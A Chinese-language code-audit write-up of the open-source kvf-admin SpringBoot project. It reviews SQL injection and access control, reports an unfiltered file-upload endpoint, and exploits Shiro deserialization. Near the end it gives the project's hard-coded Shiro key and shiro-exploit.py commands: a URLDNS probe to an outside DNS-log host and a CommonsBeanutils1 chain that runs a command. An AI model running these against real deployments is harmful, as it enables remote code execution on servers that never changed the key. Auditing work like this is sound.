初学SpringBoot框架,找了个开源项目练习一下学到的审计技巧,这次审计的是github上的一个开源OA项目,项目地址:https://github.com/kalvinGit/kvf-admin,项目直接使用maven一键搭建,没什么好说的,直接开审

1.常规sql注入检查

找到mybatis的mappre配置文件

在mapper文件夹内搜索$符号看看是否存在未使用预编译的sql语句,只找到一处,我们跟进看看

位于selectPermission方法

该函数只有一个用法,在MenuServiceImpl类中的getPermission方法中调用

getPermission,发现是在shiro授权中调用的,而且userId看似也不可控,无奈放弃

2.越权检查

此项目采用shiro做权限管理,定位到shiro配置

可以看到除了少数的几个

/static/ /login/ /duird/ /captcha是anon权限,除了上述的路由其他的所有路由都设置为了authc过滤器,authc过滤器是shiro自带的一个过滤器用于检测用户是否登录,如果没有登录将会跳转到设置的登录页面,这里是跳转到/login

3.任意文件上传

在路由/common/fileUpload处存在文件上传接口

可以看到此处接受了file,type参数,并且type参数必须为UploadPathEnum中定义的类型,type参数决定了文件上传的目录

此处没有任何过滤所以存在文件上传漏洞,我们构造请求页面发起请求,可以看到当type参数为file时会上传到file/目录下

同时,当file参数为image时会上传到image目录下

4.Shiro反序列化

在shiro的config中我们明显地看到了硬编码,使用此应用的人如果没有及时更换密钥那么就会造成反序列化漏洞

此项目shiro版本为1.6,在shiro1.4.2后使用GCM加密方法,将反序列化payload使用GCM加密方法后攻击即可

URLDNS探测

1
python shiro-exploit.py yso -g URLDNS -c "http://4d43e338.toxiclog.xyz" -u http://127.0.0.1:8080 -k 2AvVhdsgUs0FSA3SDFAdag== -v2

由于本项目没有CC依赖,所以我们用shiro无依赖打,利用CommonsBeanutils1

1
python shiro-exploit.py yso -g CommonsBeanutils1 -c "calc" -u http://127.0.0.1:8080 -k 2AvVhdsgUs0FSA3SDFAdag== -v 2

手动复制payload打